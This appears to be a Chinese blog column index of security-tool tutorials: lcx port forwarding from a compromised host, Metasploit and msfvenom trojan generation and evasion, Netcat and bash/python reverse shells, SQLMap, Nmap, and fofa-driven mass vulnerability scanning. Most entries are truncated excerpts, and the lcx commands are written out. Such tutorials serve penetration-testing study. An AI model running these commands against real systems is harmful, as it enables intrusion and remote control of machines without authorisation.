安全工具
本专栏主要介绍在安全圈中的常用工具。
多学点技术
不多学点技术,迟早要露馅儿!!!
展开
-
【端口转发】内网端口转发
0x001 lcx使用1. 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口例如:lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389意思是把肉鸡的 3389 端口转发到 xxx.xxx.xxx.xxx 公网的 10000 端口2. 公网 ip 机器上执行 Lcx.exe –listen 10000 10001例如:Lcx.exe –listen 10001 10000意思是监听公网 ip 机器上的原创 2021-06-10 16:27:32 · 524 阅读 · 0 评论 -
【src挖掘】fofa联动xray批量刷src
目录1、利用fofa API收集目标2、使用xray批量验证1、利用fofa API收集目标需要安装python2# -*- coding: utf-8 -*-import timeimport urllib2import fofaimport jsondef write_url(urls): with open('xxx.txt','a+') as f: f.write(urls+'\n')if __name__ == "__main__": ema原创 2021-02-16 15:16:20 · 2849 阅读 · 2 评论 -
【漏洞利用框架】Metasploit常用命令
目录一、MSF终端命令0x001、数据库初始化0x002、启动msf0x003、connect0x004、show0x005、search0x006、use命令0x007、msf反弹shell后的乱码问题0x008、hosts0x009、services0x010、更多MSF终端命令二、Meterpreter命令三、MSF payload命令四、MSFencode命令五、MSFcli命令六、Metasploit高级忍术七、MSFvenom八、Meterpreter后渗透攻击阶段命令一、MSF终端命令原创 2020-12-14 16:04:29 · 2578 阅读 · 0 评论 -
【信息收集】JSFinder—从js文件中寻找敏感接口和子域名
目录0x001 项目地址0x002 使用方式0x001 项目地址在渗透测试及漏洞挖掘过程中,信息搜集是一个非常重要的步骤。而在网站的JS文件中,会存在各种对测试有帮助的内容。比如:敏感接口,子域名等。JSFinder获取URL和子域名的方式:0x002 使用方式简单爬取python JSFinder.py -u http://www.mi.com这个命令会爬取 http://www.mi.com 这单个页面的所有的js链接,并在其中发现url和子域名更多参数查看作者项目:Gi转载 2020-12-10 14:37:27 · 1149 阅读 · 0 评论 -
【系统漏洞检测】Windows分析工具
文章目录一、Sherlock二、PrivescCheck三、Windows补丁在线查询一、SherlockGitHub:https://github.com/rasta-mouse/Sherlock直接运行powershell时提示“无法加载文件ps1,因为在此系统中禁止执行脚本。主要是由于没有权限执行脚本。get-help about_signing 提示了解执行策略get-executionpolicy 查看到当前策略set-executionpolicy remot原创 2020-10-20 11:15:18 · 2056 阅读 · 0 评论 -
【漏洞利用框架】Metasploit基本使用
文章目录一、Metasploit 是什么?二、使用Metasploit框架的基本步骤三、msfvenom工具1、生成木马后门2、对 Payload 进行编码3、漏洞利用四、漏洞攻击流程1、搜索攻击模块2、进入模块3、查看模块所需参数4、设置配置参数5、查询该模块下的payload6、设置payload7、启动服务五、永恒之蓝六、meterpreter 会话管理七、免杀八、木马混淆一、Metasploit 是什么?Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行原创 2020-09-28 15:32:48 · 3832 阅读 · 1 评论 -
【漏扫工具】AWVS12使用介绍
目录一、AWVS是什么?二、AWVS界面介绍1、仪表盘2、扫描目标3、漏洞列表4、扫描结果5、下载报告6、设置一、AWVS是什么?Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。AWVS是一款Web漏洞扫描工具,通过网络爬虫测试网站安全,检测流行的Web应用攻击,如跨站脚本、sql 注入等。官方网站:https://www.acunetix.com/二、AWVS界面介原创 2020-09-24 17:55:46 · 1001 阅读 · 0 评论 -
【NC】Netcat瑞士军刀使用
目录一、Netcat瑞士军刀介绍二、常用参数三、实战1、聊天室2、文件传输3、端口扫描4、nc反弹shell5、服务机没有安装nc情况如何反弹shell?1)bash -i 反弹shell2)python反弹一、Netcat瑞士军刀介绍Netcat瑞士军刀介绍Netcat 常称为 nc,拥有“瑞士军刀”的美誉。nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类原创 2020-09-22 16:10:51 · 878 阅读 · 0 评论 -
【SQL注入工具】SQLMap参数详解
文章目录前言1、基本参数2、显示调试信息3、风险等级4、批量测试多个注入点5、获取http请求注入6、处理Google搜索结果7、以POST方式提交参数8、指定参数连接符9、cookie注入10、referer/headers/proxy11、时间控制12、绕过策略13、手动指定测试参数14、指定参数前后闭合字符15、指定使用哪种探测技术16、UNION查询指定参数17、二阶注入18、搜索指定库/表/列19、--udf-inject/--shared-lib20、日志文件读取与写入21、默认yes22、编码原创 2020-09-02 17:13:16 · 3527 阅读 · 0 评论 -
【端口扫描工具】Nmap使用指南
目录一、端口状态1、open2、closed3、filtered4、unfiltered5、open|filtered6、closed|filtered二、Nmap使用1、扫描类型2、扫描参数三、扫描案例1、扫描C段(局域网)存活主机2、扫描指定IP开放端口号3、扫描指定IP所开端口及服务版本4、探测主机操作系统5、穿透防火墙扫描6、全面探测,-A包含OS 探测,版本探测,脚本扫描,traceroute7、使用脚本扫描一、端口状态1、open应用程序正在此端口上积极接受TCP连接,UDP数据报或SC原创 2020-09-09 15:29:30 · 1146 阅读 · 0 评论